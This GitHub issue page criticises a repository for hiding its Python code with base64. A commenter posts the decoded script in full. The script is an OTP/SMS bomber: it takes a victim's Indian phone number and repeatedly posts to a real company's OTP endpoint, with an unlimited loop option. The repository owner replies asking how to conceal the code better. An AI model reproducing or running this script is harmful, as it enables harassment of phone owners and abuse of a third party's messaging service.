Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Base64 encoding is not encryption #1

Open
robbyoconnor opened this issue Jul 7, 2020 · 7 comments
Open

Base64 encoding is not encryption #1

robbyoconnor opened this issue Jul 7, 2020 · 7 comments

Comments

@robbyoconnor
Copy link

robbyoconnor commented Jul 7, 2020

image

@gargakshit
Copy link

also, why python, simple bash works

@gargakshit
Copy link

lmao

@gargakshit
Copy link

image

@robbyoconnor
Copy link
Author

import requests
print('Mister H')
print('Follow on IG: @__mister_h__\nTelegram: @M15T3R_H\nTelegram Group: https://t.me/TermuxNewUser\nImportant: Only supports Indian Numbers\n')
n=input("Enter 10-digit Number:")
p=input("Number of OTPs(0 for unlimited):")
try:
 if int(p)>0: 
  for i in range(int(p)):
   requests.post('https://www.aakash.ac.in/cbt/get-centre-by-city.php', data={'action':'otp','key':n})
   print('Number of requests sent:'+str(i+1))
 elif int(p)==0:
  print('Ctrl+C to Exit')
  i=0
  while True:
   i+=1
   requests.post('https://www.aakash.ac.in/cbt/get-centre-by-city.php', data={'action':'otp','key':n})
   print('Number of requests sent:'+str(i))
 else:
  print('invalid input')
except:
 print('error occured')

@robbyoconnor
Copy link
Author

I don't understand why they try to obfuscate and "encrypt" using base64 lol

@robbyoconnor
Copy link
Author

It's not like they can hide their shitty code -- it's easy to recover.

@Misterr-H
Copy link
Owner

Any suggestions Dude how to Encrypt Code? I just get hands on Base64 when I googled it!!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants